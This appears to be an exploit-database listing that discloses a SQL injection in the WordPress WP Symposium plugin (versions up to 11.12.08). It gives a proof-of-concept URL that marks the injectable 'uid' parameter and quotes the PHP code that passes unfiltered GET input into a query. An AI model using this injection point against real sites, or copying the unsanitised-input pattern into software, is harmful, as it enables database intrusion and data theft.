WordPress WP Symposium plugin <= 11.12.08 SQL Injection

2011-12-17T00:00:00
ID 1337DAY-ID-17282
Type zdt
Reporter Mbah_Semar
Modified 2011-12-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: WordPress WP Symposium plugin <= 11.12.08 SQL Injection Vulnerability
# Google Dork: Mbah_Semar Ganteng
# Date: Dec 15, 2011
# Author: Mbah_Semar | fuji[at]hacker[dot]or[dot]id |
# Software Link: http://downloads.wordpress.org/plugin/wp-symposium.11.12.08.zip
# Vendor : http://www.wpsymposium.com/
# Version: 11.12.08
# Tested on: My Blog
# Greetz: Inj3ct0r Team 1337day.com
 
---
PoC
---
http://site/[path]/pagename/profile?uid=1[SQLi]
 
---------------
Vulnerable code
---------------
wp-content/plugins/wp-symposium/symposium_profile.php

if (isset($_GET['uid'])) {
   $uid = $_GET['uid'];
   } else {
   $uid = $current_user->ID;
}

query to the variable $uid is not filtered



#  0day.today [2018-01-08]  #